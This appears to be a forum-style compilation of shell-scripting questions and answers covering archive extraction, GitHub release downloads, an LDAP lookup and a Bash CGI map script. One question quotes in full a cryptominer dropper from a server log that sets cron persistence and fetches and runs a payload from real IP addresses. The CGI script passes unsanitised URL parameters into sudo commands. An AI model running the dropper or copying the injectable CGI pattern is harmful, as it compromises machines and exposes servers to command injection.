tar -x -v -z -f abc.tar.gz -C ~/libs/dl/ | cut -d '/' -f 1 | sort | uniq >> `dirname ~/libs/dl/`/.extracted_dirs
Related
The code below showed up in my python3 server log, on my Ubuntu 20.04 Linux desktop system. Is it just my suspicious nature, or was this an attempt to hack my computer?
cc=http://31.42.177.123
sys=sysrv005
bit=$(getconf LONG_BIT)
ps aux | grep kthreaddi | grep tmp | awk '{print $2}' | xargs -I % kill -9 %
ps aux | egrep 'sysrv001|sysrv002|sysrv003|sysrv004|network01|network00' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep sysrv | grep -v 0 | awk '{print $2}' | xargs -I % kill -9 %
crontab -r
echo "*/30 * * * * (curl --user-agent curl_cron $cc||wget --user-agent wget_cron -q -O - $cc)|sh" | crontab -
#pkill -9 $sys
get() {
chattr -i $2; rm -rf $2
curl --user-agent curl_ldr$bit -fsSL $1 > $2 || wget --user-agent wget_ldr$bit -q -O - $1 > $2 || php -r "file_put_contents('$2', file_get_contents('$1'));"
chmod +x $2
}
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
ps -fe | grep $sys | grep -v grep; if [ $? -ne 0 ]; then
get 31.210.20.120/sysrvv $sys; ./$sys
fi
Yes it's a Bitcoin Miner.
31.42.177.123/... basically downloads the above shell script, which points to 31.210.20.120 to download the sysrvv file which is a Bitcoin miner.
Objective:
I'm trying to write a script that will fetch two URLs from a GitHub release page and do something different with each one.
So far:
Here's what I've got so far.
λ curl -s https://api.github.com/repos/mozilla-iot/gateway/releases/latest | grep "browser_download_url.*tar.gz" | cut -d : -f 2,3 | tr -d \"
This will return the following:
"https://github.com/mozilla-iot/gateway/releases/download/0.8.1/gateway-8c29257704ddb021344bdaaa790909a0eacf3293bab94e02859828a6fd9b900a.tar.gz"
"https://github.com/mozilla-iot/gateway/releases/download/0.8.1/node_modules-921bd0d58022aac43f442647324b8b58ec5fdb4df57a760e1fc81a71627f526e.tar.gz"
I want to be able to create some directories, pull in the first one, navigate in the directories from the newly pulled zip after extracting it, and then pull in the second.
fetching the first line is easy by piping the output to head -n1. for solving your problem, you need more than just fetching the first URL of the cURL output. give this a try:
#!/bin/bash
# fetch your URLs
answer=`curl -s https://api.github.com/repos/mozilla-iot/gateway/releases/latest | grep "browser_download_url.*tar.gz" | cut -d : -f 2,3 | tr -d \"`
# get URLs and file names
first_file=`echo "$answer" | grep -Eo '.+?\.tar\.gz' | head -n1 | tr -d " "`
second_file=`echo "$answer" | grep -Eo '.+?\.tar\.gz' | head -n2 | tail -1 | tr -d " "`
first_file_name=`echo "$answer" | grep -Eo '[^/]+?\.tar\.gz' | head -n1 `
second_file_name=`echo "$answer" | grep -Eo '[^/]+?\.tar\.gz' | head -n2 | tail -1`
#echo $first_file
#echo $first_file_name
#echo $second_file_name
#echo $second_file
# download first file
wget "$first_file"
# extracting first one that must be in the current directory.
# else, change the directory first and put the path before $first_file!
tar -xzf "$first_file_name"
# do your stuff with the second file
You can simply pipe the URLs to xargs curl;
curl -s https://api.github.com/repos/mozilla-iot/gateway/releases/latest |
grep "browser_download_url.*tar.gz" |
cut -d : -f 2,3 | tr -d \" |
xargs curl -O
Or if you want to do some more manipulation on each URL, perhaps loop over the results:
curl ... | grep ... | cut ... | tr ... |
while IFS= read -r url; do
curl -O "$url"
: maybe do things with "$url" here
done
The latter could easily be extended to someting like
... | while IFS= read -r url; do
d=${url##*/}
mkdir -p "$d"
( cd "$d"
curl -O "$url"
tar zxf *.tar.gz
# end of subshell means effects of "cd" end
)
done
I am confused with this make.sh file. I read previous posts about shell scripts structure but I could not find out about this file. what is the function of this file? ....
Can anyone explain it step by step?
#!/bin/sh
rm out/*
example_number=0
for name in `ls in`
do
out=`cat in/$name | grep ".o " | tr -s \ | cut -d\ -f2`
inp=`cat in/$name | grep ".i " | tr -s \ | cut -d\ -f2`
echo -n "${name} (i=${inp}, o=${out}) "
if [ $inp -le 12 ]
then
cat in/$name \
| sed '/.i/d' \
| sed '/.o/d' \
| sed '/.p/d' \
| sed '/.e/d' \
| sed 's/|/ /g' \
| tr -s \ \
| sed 's/^[ \t]*//;s/[ \t]*$//' \
> out/${name}.in
tst=`cat out/${name}.in | cut -d\ -f2 | grep - -c`
if [ $tst -ne 0 ]
then
echo "remove file"
rm out/${name}.in
else
echo processing...
./unix2dos.exe -q out/${name}.in
example_number=`expr $example_number + 1`
fi
else
echo " skip"
fi
done
for name in `grep 2 -l out/*`
do
echo Remove $name
rm $name
example_number=`expr $example_number - 1`
done
echo Number of examples is $example_number
# bad files
# apla ( 222? )
# tms
# mainpa...
It is not a Makefile, but a shell script. You can see this from the file extension .sh and from the header
#!/bin/sh
Which is the instruction to use the shell to execute this file.
How can I get directory for specified DN by one ldapsearch request?
I mean - I have few databases. OpenLDAP configured with cn=config. For each DN - it hve own ldif-file, where it's olcDbDirectory specified.
Can I obtain olcDbDirectory value for each DN?
For backup script - I need to set varibale which contains directory, and this variable changes every time for every DN, wich backuped/restored at this moment.
So - in bash I just found solution to create function like:
#!/bin/bash
getDir () {
file=`grep -R "$1" /etc/openldap/slapd.d/ | cut -d":" -f 1 | tail -n 1`
echo $file
dir=`cat $file | grep "olcDbDirectory" | awk '{print $2}'`
echo $dir
}
getDir testdb;
$ ./dn.sh
/etc/openldap/slapd.d/cn=config/olcDatabase={9}bdb.ldif
/var/lib/ldap/testdb
But this solution seems not tidy... And I'd preffered to use something like:
getDir () {
dir=`ldapsearch -x -D "cn-root,cn=config" "*somefilter*"
}
Here it is:
$ ldapsearch -x -LLL -D 'cn=root,cn=config' -w PassWord -b 'cn=config' '(&(olcDbDirectory=*)(olcSuffix='testdb'))' olcDbDirectory | grep "olcDbDirectory" | cut -d":" -f 2
/var/lib/ldap/testdb
Of in bash function:
#!/bin/bash
getDir () {
dirtodel=`ldapsearch -x -LLL -D 'cn=root,cn=config' -w PassWord -b 'cn=config' '(&(olcDbDirectory=*)(olcSuffix='${1}'))' olcDbDirectory | grep "olcDbDirectory" | cut -d":" -f 2`
echo $dirtodel
}
getDir 'dc=testdb'
Result:
$ ./dn.sh
/var/lib/ldap/testdb
I am trying to build a Bash CGI Script that takes in coordinates as parameters from the url and uses osmosis to extract the map and the splitter and mkgmap to make the map so that it can be opened with Qlandkarte. My problem being is that when i type wget localhost/cgi-bin/script.pl?top=42&left=10&bottom=39&right=9&file=map.osm the linux terminal reads the file with the coordinates. How can I make wget just activate the script so it takes the coordinates and executes the commands. And also when the map is created at the end how can a return the file that was created by the script.
Thanks
#!/bin/bash
TOP=`echo "$QUERY_STRING" | grep -oE "(^|[?&])top=[0.0-9.0]+" | cut -f 2 -d "=" | head -n1`
LEFT=`echo "$QUERY_STRING" | grep -oE "(^|[?&])left=[0.0-9.0]+" | cut -f 2 -d "=" | head -n1`
BOTTOM=`echo "$QUERY_STRING" | grep -oE "(^|[?&])bottom=[0.0-9.0]+" | cut -f 2 -d "=" | head -n1`
RIGHT=`echo "$QUERY_STRING" | grep -oE "(^|[?&])right=[0.0-9.0]+" | cut -f 2 -d "=" | head -n1`
FILE=`echo "$QUERY_STRING" | grep -oE "(^|[?&])file=[^&]+" | sed "s/%20/ /g" | cut -f 2 -d "="`
$(sudo osmosis --read-xml file=bulgaria.osm --bounding-box top=$TOP left=$LEFT bottom=$BOTTOM right=$RIGHT --write-xml file=$FILE)
$(sudo java -Xmx900m -jar splitter.jar --max-nodes=110000 $FILE)
$(sudo java -ea -Xmx900m -jar mkgmap.jar --tdbfile --route -c template.args)
echo "Content-type: text/html"
echo ""